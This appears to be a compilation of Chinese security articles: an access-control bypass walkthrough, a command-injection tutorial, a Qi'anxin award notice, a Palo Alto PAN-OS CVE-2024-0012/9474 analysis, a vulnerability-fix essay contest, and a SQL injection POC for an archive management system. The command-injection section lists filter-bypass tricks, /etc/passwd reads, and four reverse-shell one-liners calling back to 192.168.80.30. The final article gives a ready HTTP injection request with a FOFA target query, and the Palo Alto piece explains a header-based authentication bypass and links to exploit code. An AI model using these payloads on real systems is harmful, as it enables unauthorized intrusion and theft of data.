按照上一个案例的方法可以越权增加删除等操作
对于一些小程序、app就需要反编译去找一找接口测试请求参数肯定是在客户端总能找到
**利用模糊查询越权**
查询的功能点,这里没有任何数据
![](https://mmbiz.qpic.cn/sz_mmbiz_png/CgXd9Hbb64mG9JyKbBbApicF4YaUicMns0vWk17ecoTiaSskFLUW63udibR7S4Gd8WTclSiakecCUVAquLQ9nb6kLoQ/640?wx_fmt=png&from=appmsg "")
参数值为学号
![](https://mmbiz.qpic.cn/sz_mmbiz_png/CgXd9Hbb64mG9JyKbBbApicF4YaUicMns0VPP7AboDOnajVUtFLdQVpCXS7lLoS8Yq43xKyYzA0vRp14RJ787MAw/640?wx_fmt=png&from=appmsg "")
这里后端大概率使用了模糊查询,直接修改为%放包,%代表匹配所有
![](https://mmbiz.qpic.cn/sz_mmbiz_png/CgXd9Hbb64mG9JyKbBbApicF4YaUicMns0IlNmyT66V1IZibUPGhjBwzZ3t2MFyy3N0U3RdeLnxbjD3mvl36VJeTg/640?wx_fmt=png&from=appmsg "")
返回了大量敏感信息
![](https://mmbiz.qpic.cn/sz_mmbiz_png/CgXd9Hbb64mG9JyKbBbApicF4YaUicMns0TaCnYtIXmvzwYESZqFKJOkZ5AU4MpDdzsic6Y2yBsJHQtqiak7oibibS2Q/640?wx_fmt=png&from=appmsg "")
**绕过前端限制**
包挨骂的水洞专用漏洞:如下图,只能选择这些里面的系统
![](https://mmbiz.qpic.cn/sz_mmbiz_png/CgXd9Hbb64mG9JyKbBbApicF4YaUicMns0CNibsTaRS5KlIDsE5fKS5QmdyYiboWLROeibZMsdjKhKeMV1efeKqhd8Q/640?wx_fmt=png&from=appmsg "")
这里点击保存把能改的全改成111假如没有申请人工号这个参数也可以想办法找到之后手动添加看看会不会被修改
![](https://mmbiz.qpic.cn/sz_mmbiz_png/CgXd9Hbb64mG9JyKbBbApicF4YaUicMns0dk3xvbSb730oXZlicibmzM3iaoEibFWsERWG67x3iaB5TM9CJenicqhMkYqQ/640?wx_fmt=png&from=appmsg "")
可以看到系统已经选择了111上面不能修改的申请人也变成了111
![](https://mmbiz.qpic.cn/sz_mmbiz_png/CgXd9Hbb64mG9JyKbBbApicF4YaUicMns0l1y98hA7bILr2TbkDAwaiaRVNiahiaJA2KkeRoX3EASFYuyasddkp9SFw/640?wx_fmt=png&from=appmsg "")
我这里只是保存草稿讲一下思路,实际还需要提交看看是否提交成功,大概率是能成功的

View File

@ -0,0 +1,495 @@
# 命令执行漏洞基础
长风实验室 2024-11-20 10:31
# 一、原理
#### 1.命令执行
**命令执行Remote Command Execution, RCE**
Web应用的脚本代码在执行命令的时候过滤不严从而注入一段攻击者能够控制的代码在服务器上以Web服务的后台权限远程执行恶意指令
**成因**
· 
代码层过滤不严
· 
系统的漏洞造成命令注入
· 
调用的第三方组件存在代码执行漏洞
· 
常见的命令执行函数
PHPexec、shell_exec、system、passthru、popen、proc_open等
ASP.NETSystem.Diagnostics.Start.Process、System.Diagnostics.Start.ProcessStartInfo等
Javajava.lang.runtime.Runtime.getRuntime、java.lang.runtime.Runtime.exec等
#### 2.代码执行
代码执行漏洞由于服务器对危险函数过滤不严导致用户输入的一些字符串可以被转换成代码来执行从而造成代码执行漏洞
成因
 
用户能够控制函数输入
存在可执行代码的危险函数
常见代码执行函数
PHP: eval()assert()call_user_func()create_function()array_map()call_user_func_array()array_filter()uasort()preg_replace()
Javascript: eval
VbscriptExecute、Eval
Python: exec
#### 3.命令执行与代码执行的区别
1.命令注入则是调用操作系统命令进行执行
2.代码执行漏洞是靠执行脚本代码调用操作系统命令
#### 4.危害
可以执行代码、系统命令进行文件读写文件上传、反弹shell等操作
### 二、代码执行函数
#### 1. eval()
1.eval() 函数把字符串按照 PHP 代码来计算。
2.该字符串必须是合法的 PHP 代码,且必须以分号结尾。
**使用eval()函数有时候需要添加 ?>**
原因是eval()函数相当于执行php的代码<?= 就相当于<?php echo在PHP7以上不管short_open_tag配置是不是开启的。都可以使用。所以就相当于一个新的PHP文件这样的话就需要将最开始前面的<?php给闭合不然不会执行。闭合之后就相当于
=`ls`;
#### 2. assert()
assert函数是直接将传入的参数当成PHP代码执行不需要以分号结尾特别注意有时加上分号不会显示结果
#### 3. ${}
${ } 会把{}内的php代码或系统命令解析执行
[MISSING IMAGE: ,  ]
#### 4. call_user_func()
把第一个参数作为回调函数调用(如下图call_user_func()里面有两个参数a会作为回调函数调用b)
第一个参数 callback 是被调用的回调函数其余参数是回调函数的参数
[MISSING IMAGE: ,  ]
mixed call_user_func ( callable $callback [, mixed $parameter [, mixed $... ]] )
#### 5. create_function()
用来创建匿名函数,执行代码
· 
args是要创建的函数的参数
· 
code是函数内的代码
create_function(string $args,string $code)
#### 6. array_map
为数组的每个元素应用回调函数
[MISSING IMAGE: ,  ]
#### 7. call_user_func_array()
回调函数,参数为数组
第一个参数作为回调函数callback调用把参数数组作param_arr为回调函数的的参数传入
call_user_func_array ( callable $callback , array $param_arr )
#### 8. array_filter()
依次将 array 数组中的每个值传递到 callback 函数如果 callback 函数返回 true则 array 数组的当前值会被包含在返回的结果数组中数组的键名保留不变。
array array_filter ( array $array [, callable $callback [, int $flag = 0 ]] )
#### 9. uasort()
1使用自定义函数对数组进行排序
本函数将用用户自定义的比较函数对一个数组中的值进行排序
如果要排序的数组需要用一种不寻常的标准进行排序,那么应该使用此函数
bool usort ( array &$array , callable $value_compare_func )
### 三、命令执行函数
#### 1. echo
可以用于圆括号不能用的场景
如:
echo`cat flag.php`;
#### 2. system
该函数会把执行结果输出并把输出结果的最后一行作为字符串返回如果执行失败则返回false这个也最为常用
<?php
highlight_file(__FILE__);
system('pwd');
system('whoami');
?>
#### 3. exec
不输出结果返回执行结果的最后一行可以使用output进行输出
<?php
highlight_file(__FILE__);
exec('pwd',$b);
var_dump($b);
?>
#### 4. passthru
此函数只调用命令并把运行结果原样地直接输出没有返回值。
<?php
highlight_file(__FILE__);
passthru('ls');
?>
#### 5. shell_exec
不输出结果,返回执行结果使用反引号(``)时调用的就是此函数
<?php
highlight_file(__FILE__);
var_dump(shell_exec('ls'));
?>
#### 6. ob_start
此函数将打开输出缓冲当输出缓冲激活后脚本将不会输出内容除http标头外相反需要输出的内容被存储在内部缓冲区中。
内部缓冲区的内容可以用 ob_get_contents() 函数复制到一个字符串变量中想要输出存储在内部缓冲区中的内容,可以使用 ob_end_flush() 函数另外, 使用 ob_end_clean() 函数会静默丢弃掉缓冲区的内容
<?php
    ob_start("system");
    echo "whoami";
    ob_end_flush();
?>
#### 7. 命令连接符
Windows和Linux都支持的命令连接符
cmd1 | cmd2 只执行cmd2
cmd1 || cmd2 只有当cmd1执行失败后cmd2才被执行
cmd1 & cmd2 先执行cmd1不管是否成功都会执行cmd2
cmd1 && cmd2 先执行cmd1cmd1执行成功后才执行cmd2否则不执行cmd2
Linux还支持分号;
cmd1 ; cmd2
 
按顺序依次执行先执行cmd1再执行cmd2
### 四、绕过姿势
#### 1. 关键字绕过
输出函数
cat
tac
more
less
head
tac
tail
nl   #nl<fl''ag.php||   nl输出flag有时候只能看见行号需要打开源代码才能看到内容
od
vi
vim
sort
uniq
#### 2. 常见分隔符
换行符 %0a
回车符 %0d
连续指令
后台进程 &  
管道符 |
逻辑 ||、&&
#### 3. 空格
可以用以下字符代替空格
<   #tac<fla''g.php||
>  # > 在Linux是追加并覆盖文件的意思使用该命令需要写的权限
${IFS}
$IFS$9
%0a
%09  (反引号中只能用%09绕过)
%20
%3c
$@            # cat$@t flag
$1-$9        # cat$1t flag
${数字}      # cat${1}t flag
$IFS在linux下表示分隔符加一个{}固定了变量名同理在后面加个$可以起到截断的作用
$9只是当前系统shell进程的第九个参数的持有者它始终为空字符串
#### 4. 命令终止符
%00
%20
#### 5. 通配符
* 字符被过滤,用
*
通配符代替如fla* 通过测试不能与IFS或<这两个字符一起使用
''
“”
单引号和双引号截断绕过如fl''ag.php
?
可替代单个字符。
*
可替代任意字符如fla?.php
. 如php被过滤可以 用 p
.
hp
#### 6. 反斜杠
ca\t f\la\g.php
#### 7. PHP短标签
PHP的标签有至少四种<?php ?><?=
?>、<script language="php"></script><? ?><% %>(ASP风格)、<%= %>。
<?=相当于是一个<?php echo
PHP的配置文件php.ini中
"<? ?>"的支持需要short_open_tag=On,要在XML中使用PHP需要禁用此标签。
"<%%>"的支持需要asp_tags=On。
"<?= ?>"总是有效的无论short_open_tag是否设置。
除了<?php ?><?=?>其他的标签在PHP7.0.0中被移除,强烈建议使用<?php?>标签,代码才能更好的兼容性。
#### 8. 敏感字符绕过
##### l 变量绕过
a=l,b=s;
b
##### l base64编码绕过
echo 'cat' | base64
`echo 'Y2F0Cg==' | base64 -d` test.txt
##### l 文件包含绕过
c=eval($_GET[a]);&a=system('cat fla*');
c=eval($_GET[a])?>&a=system('cat fla*');#如果过滤了分号,可以用?> 闭合进行绕过
编码绕过include$_GET["x"];&x=php://filter/read=convert.base64-encode/resource=flag.php
##### l 无参数函数绕过
数组操作
array_flip() #交换数组中的键和值
array_rand() #从数组中随机取出一个或多个单元
array_reverse() #返回一个单元顺序相反的数组
current() #返回数组中的当前单元
文件操作
file_get_contents() #将整个文件读入一个字符串
readfile() #读取文件并写入到输出缓冲
highlight_file() [别名show_source()] #语法高亮一个文件
scandir() #列出指定路径中的文件和目录
direname() #给出一个包含有指向一个文件的全路径的字符串,本函数返回去掉文件名后的目录名。
getcwd() #取得当前工作目录
chdir($directory) #将 PHP 的当前目录改为 directory。
读取环境变量
get_defined_vars() #此函数返回一个包含所有已定义变量列表的多维数组,这些变量包括环境变量、服务器变量和用户定义的变量。
getenv() #获取一个环境变量的值
localeconv() #返回一包含本地数字及货币格式信息的数组,第一个值一直是.
phpversion() #获取当前的PHP版本
会话
session_id() #获取/设置当前会话 ID
session_start() #启动新会话或者重用现有会话
其它
chr():返回指定的字符。
rand():产生一个随机整数。
time():返回当前的 Unix 时间戳。
localtime():取得本地时间。
localtime(time()) 返回一个数组Array [0] 为一个 0~60 之间的数字。
hex2bin():转换十六进制字符串为二进制字符串。
ceil():进一法取整。
sinh():双曲正弦。
cosh():双曲余弦。
tan():正切。
floor():舍去法取整。
sqrt():平方根。
crypt():单向字符串散列。
hebrevc:将逻辑顺序希伯来文logical-Hebrew转换为视觉顺序希伯来文visual-Hebrew并且转换换行符。
hebrevc(crypt(arg)) [crypt(serialize(array()))]:可以随机生成一个 hash 值 第一个字符随机是 $(大概率) 或者 .(小概率) 然后通过 ord chr 只取第一个字符。
ord:返回字符串的第一个字符的 ASCII 码值。
##### l 未定义的初始化变量
cat$b /etc/passwd
##### l 连接符
cat /etc/pass'w'd
例子ls命令我们可以通过以下语法代替执行
/???/?s --help
#### 9. 反向连接Reverse Shell的各类技术方法
- ; perl-e 'use Socket;$i="192.168.80.30";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh-i");};'
- ; python-c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.80.30",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
- ; php-r '$sock=fsockopen("192.168.80.30",443);exec("/bin/sh-i<&3 >&3 2>&3");
- ; ruby-rsocket-e'f=TCPSocket.open("192.168.80.30",443).to_i;execsprintf("/bin/sh-i<&%d >&%d 2>&%d",f,f,f)'
#### 10. 一些场景应用
1、无任何过滤或简单过滤
![](https://mmbiz.qpic.cn/sz_mmbiz_png/twRRNxG1MqwqgIkYXMvU1yfRJAsGnGEfgiajYDQPP2IbZwhDtUqga6clian9xEW0nnibCPZjUXfPtwxqMibnVXamSw/640?wx_fmt=png&from=appmsg "")
2、过滤了;,|,&,`
![](https://mmbiz.qpic.cn/sz_mmbiz_png/twRRNxG1MqwqgIkYXMvU1yfRJAsGnGEfT8yFETGJ6v9c3rLte5qSxsmBibgic7uia8ZVGJfianeHpqssp4EDDiaEF7g/640?wx_fmt=png&from=appmsg "")
3、过滤了;,|,&,`,\s
![](https://mmbiz.qpic.cn/sz_mmbiz_png/twRRNxG1MqwqgIkYXMvU1yfRJAsGnGEfc3oREgLic155AoibdJdLdjcgxZ0kyHOic5UpGKezYNeibTm10Len9DY2tg/640?wx_fmt=png&from=appmsg "")
4、过滤了关键词比如cat
![](https://mmbiz.qpic.cn/sz_mmbiz_png/twRRNxG1MqwqgIkYXMvU1yfRJAsGnGEfUTKrtgToCiaDdUvyHYOVCSx4Hnnrz2XzGgCgtgk7kcEnZgGb2Rju7QQ/640?wx_fmt=png&from=appmsg "")
5、页面无命令结果的回显
![](https://mmbiz.qpic.cn/sz_mmbiz_png/twRRNxG1MqwqgIkYXMvU1yfRJAsGnGEfKtQdPJhx3kspz1iajhaVwYc1Uia3qCZckDZLjVPY9x80tIo22bo8Y5Jw/640?wx_fmt=png&from=appmsg "")
****
**五、****防范措施**
尽量不要使用系统执行命令
在进入执行命令函数/方法前,变量要做好过滤,对敏感字符转义
在使用动态函数前,确保使用的函数是指定的函数之一
对PHP语言不能完全控制的危险函数就不要用

View File

@ -0,0 +1,61 @@
# 奇安信集团获2024年世界互联网大会杰出贡献奖
奇安信集团 2024-11-20 10:06
11月20日在2024年世界互联网大会乌镇峰会开幕式上
**奇安信集团凭借其在网络安全领域的卓越成就与无限潜力,荣获“世界互联网大会杰出贡献奖”**
![](https://mmbiz.qpic.cn/mmbiz_png/G3LNmiaOGjarvRTnOw8TU9UZyeVumesZk7Z8utwVyiboybPIXHcZE1rpHFLwUmh9OxpwwSv7Slz0ChaicFx1lkxYQ/640?wx_fmt=png&from=appmsg "")
作为大会亮点之一,世界互联网大会国际组织今年全新设立“世界互联网大会杰出贡献奖”,以表彰在全球互联网相关领域做出杰出贡献的个人和企业,
全球仅有14家企业获此殊荣
![](https://mmbiz.qpic.cn/mmbiz_jpg/G3LNmiaOGjarvRTnOw8TU9UZyeVumesZklibgh7HRm77zuU2cCbibXO53lCgDQhbKtDFwqLJ8ozHqhvSpEpr0ThuA/640?wx_fmt=jpeg&from=appmsg "")
自2016年成立以来奇安信集团始终深耕网络空间安全领域。2019年5月中国电子战略入股奇安信奇安信正式成为网络安全“国家队”2020年7月22日奇安信在科创板挂牌上市开启了全新的发展阶段。
![](https://mmbiz.qpic.cn/mmbiz_jpg/G3LNmiaOGjarvRTnOw8TU9UZyeVumesZk7qtXBYOubAVJ6171A7yBG9ZJZjmhjZxxibInX5G1dOA2ibWpKgPu0IAQ/640?wx_fmt=jpeg&from=appmsg "")
多年来,奇安信持续发展壮大,不仅在人员、收入规模和产品覆盖度上均位居行业第一,还[连续四年排名“CCIA 中国网安产业竞争力50强”榜单第一](http://mp.weixin.qq.com/s?__biz=MzU0NDk0NTAwMw==&mid=2247617283&idx=1&sn=336e1dd4a8322b0944ff0d24911dca99&chksm=fb772d07cc00a411bb44809b2c92c1dc54661a911b81a6c666e7b73249970ad1af918094b8de&scene=21#wechat_redirect)
,并被评为北京市第一批“隐形冠军”企业。
作为2022年北京冬奥会、冬残奥会官方网络安全服务商奇安信圆满完成了保障任务实现了冬奥网络安全“零事故”的世界纪录。同时奇安信积极开拓国际市场持续推进产品国际化、服务能力国际化和市场能力国际化并于2023年10月签下[迄今为止中国网络安全出海最大项目](http://mp.weixin.qq.com/s?__biz=MzU0NDk0NTAwMw==&mid=2247599565&idx=1&sn=17cf5294eab2e4c95dd97bca33c1d421&chksm=fb7763c9cc00eadf71fb0a56345f286a938634b5d754bd141b2e47a0c3b8bf940b09f591c2cb&scene=21#wechat_redirect)
,为海外某国建设网安指挥系统,签约金额近 3亿元人民币项目有望成为“一带一路”国家标杆项目推动中国网络安全产业进一步走向世界。
随着“十四五”规划的深入实施和数字化转型的全面铺开,网络安全需求呈现井喷式增长。作为行业领军者,奇安信将紧跟时代步伐,针对新技术带来的新业态、新业务和新场景,不断创新网络安全解决方案,为政府、企业等用户提供更加全面、有效的安全保障。
展望未来,奇安信将继续秉承初心与使命,以成为“全球第一的网络安全公司”为愿景目标,不断奋进、勇攀高峰,为构建更加安全、可信的网络空间贡献自己的力量。
**附2024年世界互联网大会杰出贡献奖获奖企业名单****(排名不分前后)**
    奇安信集团
    中国电信集团有限公司
    国家电网有限公司
    阿里巴巴(中国)有限公司
    腾讯公司
    超威半导体公司AMD
    中兴通讯股份有限公司
    蚂蚁科技集团股份有限公司
    澳门电讯有限公司
    荣耀终端有限公司
    科大讯飞股份有限公司
    印象(上海)数字科技有限公司
    福瑞泰克智能系统有限公司
    海光信息技术股份有限公司

View File

@ -0,0 +1,69 @@
# 平板锅(Palo Alto)防火墙0day 漏洞分析及Exp
独眼情报 2024-11-20 07:42
![](https://mmbiz.qpic.cn/sz_mmbiz_png/KgxDGkACWnRqibw3tpUKVREPB4zJ1Fa1C8OGJoIVbVHBpXHfDgwUHRphXZPalsqVNE18kXTVJwWFohqquuRuVug/640?wx_fmt=png&from=appmsg "")
watchTowr的研究人员Sonny近期发布了一份技术分析报告深入剖析了影响Palo Alto Networks下一代防火墙(NGFW)的两个零日漏洞。这两个漏洞编号为CVE-2024-0012和CVE-2024-9474已引起包括美国网络安全和基础设施安全局(CISA)在内的多个网络安全机构的高度关注。CISA已将其列入已知漏洞目录并要求联邦机构必须在12月9日前完成修复。
CVE-2024-0012是PAN-OS管理Web界面中的一个认证绕过漏洞。根据Sonny的分析该漏洞允许远程攻击者在无需认证的情况下获得管理员权限。研究人员详细说明了他们的分析方法从仔细审查Nginx配置文件开始。
Sonny在分析报告中指出"查看主要的Nginx路由配置文件/etc/nginx/conf/locations.conf时发现了一处看似很小但影响巨大的变更。"
```
add_header Allow "GET, HEAD, POST, PUT, DELETE, OPTIONS";
 if ($request_method !~ ^(GET|HEAD|POST|PUT|DELETE|OPTIONS)$) {
   return 405;
 }
 
+proxy_set_header X-Real-IP "";
+proxy_set_header X-Real-Scheme "";
+proxy_set_header X-Real-Port "";
+proxy_set_header X-Real-Server-IP "";
+proxy_set_header X-Forwarded-For  "";
+proxy_set_header X-pan-ndpp-mode "";
+proxy_set_header Proxy "";
+proxy_set_header X-pan-AuthCheck 'on';
 # rewrite_log on;
 
 # static ones
@@ -27,6 +17,5 @@ location /nginx_status {
 location ~ \.js\.map$ {
   add_header Cache-Control "no-cache; no-store";
   proxy_pass_header Authorization;
+  include conf/proxy_default.conf;
   proxy_pass http://$gohost$gohostExt;
 }
```
研究人员发现在未打补丁的版本中X-PAN-AUTHCHECK头部设置存在缺陷这可能导致未经授权的用户访问本应受保护的端点。
通过利用这个疏忽研究人员找到了一个简单但破坏力极强的绕过方法只需将X-PAN-AUTHCHECK HTTP头部设置为off就能完全禁用认证机制。
第二个漏洞CVE-2024-9474则允许恶意的PAN-OS管理员提升权限以root身份执行命令。该漏洞存在于AuditLog.php文件中由于用户输入未经proper过滤导致可能遭受命令注入攻击。
研究人员在负责写入审计日志的函数中发现了一处关键性更改。Sonny演示了如何利用这个漏洞提升权限他表示"用户竟然可以传入包含shell元字符的用户名到AuditLog.write()函数中这些字符随后会被传递给pexecute()函数。"
Sonny敦促管理员们迅速采取行动并指出这个漏洞利用链的简单性"这两个漏洞能够出现在生产环境的设备中着实令人吃惊更让人惊讶的是它们是通过Palo Alto设备底层那堆杂乱的shell脚本调用实现的。"
为了给管理员留出打补丁的时间watchTowr暂时没有公布完整的概念验证利用代码但他们提供了一个Nuclei模板用于检测系统是否存在漏洞。
另一方面安全研究员Valentin Lobstein已经开发并发布了CVE-2024-0012和CVE-2024-9474的PoC利用代码使得漏洞利用变得极其简单。基于watchTowr的分析Lobstein开发的Go语言工具实现了攻击过程的自动化用户只需输入目标URL即可。这个现成的利用工具增加了遭受攻击的风险也凸显了及时修补易受攻击系统的紧迫性。
Palo Alto Networks已在PAN-OS 10.2.12-h2版本中修复了这些漏洞。
>
> watchTowr详细分析https://labs.watchtowr.com/pots-and-pans-aka-an-sslvpn-palo-alto-pan-os-cve-2024-0012-and-cve-2024-9474/
>
> nuclei检测模板https://github.com/watchtowrlabs/palo-alto-panos-cve-2024-0012
>
> Exp利用代码https://github.com/Chocapikk/CVE-2024-9474
>
> 请合法合规使用,任何乱用与本公众号无关,本公众号出于研究学习目的分享。

View File

@ -0,0 +1,132 @@
# 第十三期 · 安钥®「漏洞处置标准作业程序SOP」征文启示
原创 安钥 方桥安全漏洞防治中心 2024-11-20 10:00
![](https://mmbiz.qpic.cn/sz_mmbiz_png/2JVOUiaJORTssPYkVD6hiaic2K8YSOmpOJXKdlHibXMReTib5oPndcpWJyDiabtofHJsJtrR1ibic87y12Qqlvyop8C8Kw/640?wx_fmt=png&from=appmsg "")
# 锤炼安全金钥,共筑安全防线
# 安钥®「漏洞处置标准作业程序SOP」征文启示
# 第13期
11月20日 - 11月30日
# 【 活 动 主 题 】
数字时代浪潮奔涌而来,网络安全已成为国家、企业和个人必须重视的工作。
每个漏洞都可能成为网络攻击的突破口。
修补漏洞的过程经常充满挑战,如同一把把锈蚀难开的锁。
漏洞处置标准作业程序SOP就是我们全力锤炼的金钥匙旨在高效处置漏洞筑牢安全防线。
谨以此文,诚邀您参加
**“安钥®「漏洞处置标准作业程序(****SOP****)」征文”**
活动,分享您的经验和智慧,帮助国家、企业、社区、家庭、个人更有效地防范网络安全风险。
# 【 目 标 作 者 】
- 网络安全专业人员
- 软件开发人员
- IT运维人员
- 能分享安全漏洞处置经验的任何专业人士
# 【 活 动 特 点 】
- **实战导向:**
定期收集漏洞情报如必修漏洞、关键漏洞、严重影响业务的漏洞、Day 1 漏洞等针对这些漏洞征集「漏洞处置SOP」总结和分享真实工作场景中收获的经验和教训。
- **专业指导:**
提供两篇已验证的的SOP样例SOP模板SOP编写方法与过程。
[三步写好「漏洞处置SOP」](http://mp.weixin.qq.com/s?__biz=Mzk0OTQzMDI4Mg==&mid=2247484146&idx=1&sn=d5a39e4fad74df928be97dd1a952d040&chksm=c3593397f42eba81b49be3fd473da1c85c88ea8507ca69f7852cd8801064e27594684dde7f76&scene=21#wechat_redirect)
供你参考,助你快速上手。
(文末添加运营助手获取样例)
- **现金奖励******
评审合格的SOP将获得
**300元~500元**
稿酬。后续还将从合格SOP中评选出优秀作品奖金
**最高可达1,000元**
- **长期签约:**
每期的前3名有机会成为签约作者长期合作共赢。
- **公开发布:**
所有入选作品在公众号发布,并推荐到安全专业新媒体平台展示,署名作者持续积累专业声誉。
# 【 征 文 形 式 】
本身我们提供 10 个安全漏洞处置的标准作业程序SOP框架稿在此基础上你需要依照
**“修补方案”**
实施并记录,具体方式包括:
**升级、打补丁、修改配置**
等。
你可从这 10 份框架稿中任选一份或者多份,自行搭建环境实施修复方案,并详细记录修补漏洞的过程,说明具体的操作步骤和系统输出(需配图),基于修补漏洞的过程编写
**“详细漏洞处置步骤”**
后,通过邮件提交。
参考:[编写「漏洞处置SOP」的方法与要点](http://mp.weixin.qq.com/s?__biz=Mzk0OTQzMDI4Mg==&mid=2247484146&idx=1&sn=d5a39e4fad74df928be97dd1a952d040&chksm=c3593397f42eba81b49be3fd473da1c85c88ea8507ca69f7852cd8801064e27594684dde7f76&scene=21#wechat_redirect)
# 【 征 文 要 求 】
1. **原创:**
投稿作品必须为本人编写,不得抄袭,不得洗稿等。一经发现,取消资格。
1. **实用:**
依据修复方案,详细记录漏洞修复过程,说明详细操作步骤(配图)、验证及后续跟踪等关键环节,确保漏洞处置过程完整、清晰、可操作。
1. **规范:**
行文注意逻辑严谨,文字流畅。合理使用标题、段落、列表等样式组织内容,确保易于阅读。(参考样例:[漏洞修复SOP | 处置ESXi 6.7VMware ESXi 6u7a的一系列安全漏洞](http://mp.weixin.qq.com/s?__biz=Mzk0OTQzMDI4Mg==&mid=2247483946&idx=1&sn=e1a4ea2f8e2e13f3384ee76ec45942f1&chksm=c359334ff42eba5997b93f18249e498a12fd09efacba3f0366297924517748e4678d902299f5&scene=21#wechat_redirect)
 > 在上述3点基础上鼓励创新。<
1. **创新:**
体现在制订/设计漏洞处置方案以达到比常规方案更好的效果。如花的时间更短部分自动化提供shell脚本采用新技术新工具获得更好的效果等。
# 【 投 稿 方 式 】
![](https://mmbiz.qpic.cn/sz_mmbiz_png/2JVOUiaJORTuT4RLIjIWr2ywFIIEH968icC8OHxSpR7FtR2L5dAhJ0fkVE9T7y3FFZRSibW9BbyoPn3DmY0uKEPkw/640?wx_fmt=other&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "")
1. **添加运营助手:**
下方扫码添加运营助手,注明
**“SOP”**
,获取参赛附件。
1. **电子投稿:**
请将投稿作品以Word或PDF格式提交至邮箱
**SOP123#tingqiao_net**
,邮件标题请注明
**“漏洞处置SOP征文活动+署名+作品标题”**
。(注:为减少垃圾邮件,请将"#"替换成"@",将"_"替换为"."
1. **截止日期:**
2024年11月30日周六23:59前
1. **结果公布:**
2024年12月7日周六
扫码添加运营助手获取参赛附件
![](https://mmbiz.qpic.cn/sz_mmbiz_png/2JVOUiaJORTs0BYdgedlDZlsLV4xZ0ibUnRljKAMsTq37lxLQCBBuo5pgf5iahvEaL4rAfHY9wR2fyE2M8e9V2k4g/640?wx_fmt=png&from=appmsg "")
本征文活动的解释权归上海方桥信息技术有限公司所有。
**往期入选公布**
[入选作品公布安钥®「漏洞处置标准作业程序SOP」征文第一期](http://mp.weixin.qq.com/s?__biz=Mzk0OTQzMDI4Mg==&mid=2247484176&idx=1&sn=075c87d06e177c5cfc335bc6dbcf67dd&chksm=c3593275f42ebb63192e174945ba9a5af5b6d8aa45b384f4328accb7638f87122b31ab831173&scene=21#wechat_redirect)
[入选作品公布安钥®「漏洞处置标准作业程序SOP」征文第二期](http://mp.weixin.qq.com/s?__biz=Mzk0OTQzMDI4Mg==&mid=2247484220&idx=1&sn=3c76a50ede2f7968337f251cdacd34ce&chksm=c3593259f42ebb4f628b691fe3967f35acbff64cce9bdd5815c335b3d435effe2224ba59cf64&scene=21#wechat_redirect)
[入选作品公布安钥®「漏洞处置标准作业程序SOP」征文第八期](http://mp.weixin.qq.com/s?__biz=Mzk0OTQzMDI4Mg==&mid=2247484325&idx=1&sn=de7186ee2bde1a9178df7086cf65b1d9&chksm=c35932c0f42ebbd6e7f6217837931f17af287900a429dbe5f34b293b9f16e42a57d4ea678c14&scene=21#wechat_redirect)
[入选作品公布安钥®「漏洞处置标准作业程序SOP」征文第九期](http://mp.weixin.qq.com/s?__biz=Mzk0OTQzMDI4Mg==&mid=2247484336&idx=1&sn=5b5f56173e65a5aed2c40f5ef1290968&chksm=c35932d5f42ebbc342a74cacca178be54d2b6b08d095ad1dd1177b75f0998799fffd011e6ba6&scene=21#wechat_redirect)
欢迎关注公众号

View File

@ -0,0 +1,46 @@
# 紫光档案管理系统 mergeFile SQL注入漏洞
原创 CatalyzeSec CatalyzeSec 2024-11-20 11:24
# FOFA
```
app="紫光-档案管理系统"
```
# POC
```
POST /Archive/ErecordManage/mergeFile HTTP/1.1
Host:
Cache-Control: max-age=0
Accept-Language: zh-CN
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.6533.100 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 31
userID=admin&fondsid=1&comid=1'
```
# 漏洞复现
![](https://mmbiz.qpic.cn/sz_mmbiz_png/EqMwaEZz0ynRuSmicWtBVoFuSRYlbR3lCARWVzfSBPUIFGHtKOhDRC19hbKsgMj1yGW6gbz3fPHoH8rnaKy4Y6w/640?wx_fmt=png&from=appmsg "")
![](https://mmbiz.qpic.cn/sz_mmbiz_png/EqMwaEZz0ynRuSmicWtBVoFuSRYlbR3lCrDcazuylNEEMcdRKDamAwRianDibohL9F5xSdVsno4kvxBVcibRHHxApQ/640?wx_fmt=png&from=appmsg "")
# nuclei运行结果
![](https://mmbiz.qpic.cn/sz_mmbiz_png/EqMwaEZz0ynRuSmicWtBVoFuSRYlbR3lCianNA9zUv2b46UDJ24PqB4Mys9kS5Wfy3DACXhKWLdAia45GXTEfsPibg/640?wx_fmt=png&from=appmsg "")
# nuclei-poc已上传到星球
![](https://mmbiz.qpic.cn/sz_mmbiz_png/EqMwaEZz0ynRuSmicWtBVoFuSRYlbR3lCicIsiaTBkhrAiaHicxw1X30Jo6gA52g027uY9esu4LA6tPWxAzCS7WP17w/640?wx_fmt=png&from=appmsg "")
高质量安全知识星球社区致力于漏洞挖掘渗透技巧安全资料星球承诺会持续更新0/1/NDay及对应的批量利用工具团队内部漏洞库内外网攻防技巧你所需要的各类安全工具和资料以及团队师傅们最新的学习研究成果。分享行业内最新动态解答交流各类技术问题。
涉及方向包括Web渗透、免杀绕过、红蓝攻防、代码审计、应急响应、安全培训、CTF、小白入门、职业规划和疑难解答。**CatalyzeSec**
安全技术水平的催化者星球针对成员的技术问题快速提供思考方向及解决方案并为星友提供多种方向的学习资料、安全工具、POC&EXP以及各种学习笔记等以引导者和催化剂的方式助力安全技术水平的提升。
我们是一个快速成长的team团队的发展方向与每一位星友的学习方向密切相关加入我们一起成为更好的自己
PS随着星球内知识的积累人员的增加
星球价格也会随之增加前一百位加入我们的师傅可享受99元朋友价
**微信群专属推送机器人**
